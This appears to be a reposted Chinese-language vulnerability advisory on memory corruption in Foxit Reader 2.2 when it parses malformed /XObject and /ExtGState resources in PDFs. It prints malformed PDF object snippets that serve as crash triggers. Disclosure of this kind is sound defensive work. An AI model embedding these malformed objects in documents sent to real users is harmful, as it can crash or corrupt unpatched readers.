Foxit Reader PDF文件解析内存破坏漏洞
受影响系统:
foxit foxit reader 2.2
描述:
--------------------------------------------------------------------------------
bugtraq id: 28890
foxit reader是一款小型的pdf文档查看器和打印程序。
foxit reader处理包含有畸形/xobject资源的网页时存在漏洞,用户在处理恶意文件时会导致foxit reader崩溃。
当使用foxit reader旋转包含有畸形/xobject资源的网页时(或向页面添加了/rotate字段):
4 0 obj
<< /type /page
/parent 3 0 r
/rotate 170
/contents [ 25 0 r ]
/resources <<
/procset [ /pdf /text /imageb /imagec ]
/xobject <</im23 23 0 r>>/font << /tt3 33 0 r >>>>
>>
endobj
23 0 obj
<</length 11643/filter/dctdecode/width -28986631481/height 5/bitspercomponent 8/colorspace/devicergb/type/#6eject/name/#4825#6#25n#00°#6e#6en#25n#72âƒé#25n™#r3/subtype/image>>
stream
........................
endstream
endobj
如果修改了宽度和高度字段,foxit就会对各种内存地址执行无效的写访问。
在解析畸形的/extgstate资源时也存在内存破坏漏洞。在这种情况下用/font资源替换了extgstate资源,但资源类型仍为extgstate:
261 0 obj
<</type /page /parent 126 0 r /mediabox [0 0 259 408 ]/cropbox [0 0 531 666 ]/resources <</procset [/pdf /text] /extgstate <</r7 7 0 r>>>> /contents [20 0 r]>>
endobj
7 0 obj
<</firstchaaa 1
/type /funt /fontdescriptor 23 0 r
/basefont /xxxxxxxxxxxxxxxxoman,italic
/subtype /truetype
/encoding /winansiencoding
/laitchar 211
/wodths [ ]
>>
endobj
23 0 obj
<</zzz9ðe /oooooo>>
endobj
一些函数解析任何资源类型的任何字段,因此当/extgstate资源下存在/font字段时,仍会读取并解释这些字段,导致用错误的数据填充所分配的结构。
<*来源:javier vicente vallejo
链接:http://www.vallejo.cc/proyectos/foxitreader1.htm
http://www.vallejo.cc/proyectos/foxitreader2.htm
http://secunia.com/advisories/29934/
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
foxit
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.foxitsoftware.com/pdf/rd_intro.php
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论